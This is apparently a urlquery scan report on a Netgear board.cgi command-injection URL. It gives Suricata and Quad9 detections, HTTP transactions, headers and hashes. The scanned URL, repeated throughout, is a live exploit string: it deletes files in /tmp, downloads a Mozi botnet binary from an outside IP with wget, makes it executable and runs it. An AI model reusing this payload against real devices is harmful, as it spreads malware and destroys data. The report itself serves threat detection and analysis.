Report - 192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron

Report Overview

Visitedpublic

2025-02-06 18:07:39

Detections

urlquery

Network Intrusion Detection

Threat Detection Systems

Host Summary

Host	Rank	Registered	First Seen	Last Seen	Sent	Received	IP	Fingerprints
192.91.173.138	unknown	unknown	No data	No data	1.6 kB	28 kB	192.91.173.138
login.zscalerthree.net	46318	2012-10-04	2018-02-18	2024-05-07	445 B	4.5 kB	165.225.73.181

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Severity	Source IP	Destination IP	Alert
2025-02-06 18:07:11	high	Client IP	192.91.173.138	ET HUNTING Suspicious Chmod Usage in URI (Outbound)
2025-02-06 18:07:15	high	Client IP	193.137.200.189	ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound
2025-02-06 18:07:16	high	Client IP	193.137.200.189	ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound
2025-02-06 18:07:33	high	Client IP	220.130.167.33	ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound

Threat Detection Systems

Public InfoSec YARA rules

No alerts detected

OpenPhish

No alerts detected

PhishTank

No alerts detected

Quad9 DNS

Scan Date	Severity	Indicator	Alert
2025-02-06	medium	192.91.173.138	Sinkholed
2025-02-06	medium	192.91.173.138	Sinkholed
2025-02-06	medium	192.91.173.138	Sinkholed

ThreatFox

No alerts detected

JavaScript (1)

	URL	From	Size	First Seen	Last Seen
	192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron	ScriptElement	21 B	2023-03-08	2025-05-28
URL 192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron IP / ASN 192.91.173.138 #6075 LM-CORP Introduced by ScriptElement Embedded true Resource Info First Seen 2023-03-08 Last Seen 2025-05-28 Times Seen 19 Size 21 B (21 bytes) MD5 80fca9e56019284c646d06269dbda2cc SHA1 a8ace0cf793807aeb29ff548e74cef9ee59b5fd3 SHA256 9d143589c3d64303f15605cf9b2cff2f25ba73ab0ff1e54482f87c2a27b43354 Format Code Loading...

HTTP Transactions (4)

URL IP Response Size

GET 192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron

192.91.173.138

403 Forbidden

14 kB

URL

192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron

IP / ASN

192.91.173.138

#6075 LM-CORP

Requested byN/A

Resource Info

File typeHTML document text HTML document, ASCII text, with very long lines (2391)

First Seen2025-02-06

Last Seen2025-02-06

Times Seen1

Size14 kB (13779 bytes)

MD5bca948bccb824be3ee588fd27adb98c2

SHA1bb76dfce258a439b543da33274bc2c79f1a791d3

SHA256ca928ecba2fab72fe6bd8a992447ec2faf83aad3f5dd665ca46bfc239fea8f27

Detections

Analyzer	Verdict	Alert
Quad9 DNS	malicious	Sinkholed
suricata	high	ET HUNTING Suspicious Chmod Usage in URI (Outbound)

HTTP Headers

GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron HTTP/1.1
Host: 192.91.173.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Zscaler/6.2
Cache-Control: no-cache
Access-Control-Allow-Origin: *
Content-length: 13779

GET login.zscalerthree.net/img_logo_new1.png

165.225.73.181

200 OK

4.4 kB

URL

IP / ASN

165.225.73.181

#62044 Zscaler Switzerland GmbH

Requested byhttp://192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron

Resource Info

File typePNG image data, 321 x 116, 8-bit colormap, non-interlaced

First Seen2023-06-27

Last Seen2025-05-28

Times Seen19

Size4.4 kB (4350 bytes)

MD554f8d0b388d3a51afa15d167cbbcd830

SHA163d4b7a4e2a2714ddf750d6310964d6d048b1bbf

SHA256ff8a7023b983e6a103818973c3e9fea90c7b264d195486a9d453eb496515ceea

Certificate Info

IssuerDigiCert Inc

Subject*.zscalerthree.net

Fingerprint6B:2A:51:D1:F2:E2:CC:7A:BB:09:35:E0:B5:4B:48:43:71:6D:76:7A

ValidityMon, 20 May 2024 00:00:00 GMT - Mon, 19 May 2025 23:59:59 GMT

HTTP Headers

GET /img_logo_new1.png HTTP/1.1
Host: login.zscalerthree.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://192.91.173.138/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Cache-Control: max-age=3600000, public
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: image/png
Content-Length: 4350

GET 192.91.173.138/favicon.ico

192.91.173.138

403 Forbidden

14 kB

URL

192.91.173.138/favicon.ico

IP / ASN

192.91.173.138

#6075 LM-CORP

Requested byhttp://192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron

Resource Info

File typeHTML document text HTML document, ASCII text, with very long lines (2391)

First Seen2025-02-06

Last Seen2025-02-06

Times Seen1

Size14 kB (13683 bytes)

MD52f62f1dd0e87db0e316ea675ff38625d

SHA1cc9a7869ccfc18836d867728fd153e9d5c20b96d

SHA2566d550eaf1b61089127b21d9b2fd24b83834eabdc7e63c3d1a2c97122e3529286

Detections

Analyzer	Verdict	Alert
Quad9 DNS	malicious	Sinkholed

HTTP Headers

GET /favicon.ico HTTP/1.1
Host: 192.91.173.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Zscaler/6.2
Cache-Control: no-cache
Access-Control-Allow-Origin: *
Content-length: 13683

GET 192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron

0.0.0.0

0 B

URL

192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron

IP / ASN

0.0.0.0

Requested byN/A

Resource Info

File typeN/A

First Seen0001-01-01

Last Seen2025-08-02

Times Seen5607182

Size0 B (0 bytes)

MD5d41d8cd98f00b204e9800998ecf8427e

SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Detections

Analyzer	Verdict	Alert
Quad9 DNS	malicious	Sinkholed
suricata	high	ET HUNTING Suspicious Chmod Usage in URI (Outbound)

HTTP Headers

GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron HTTP/1.1
Host: 192.91.173.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache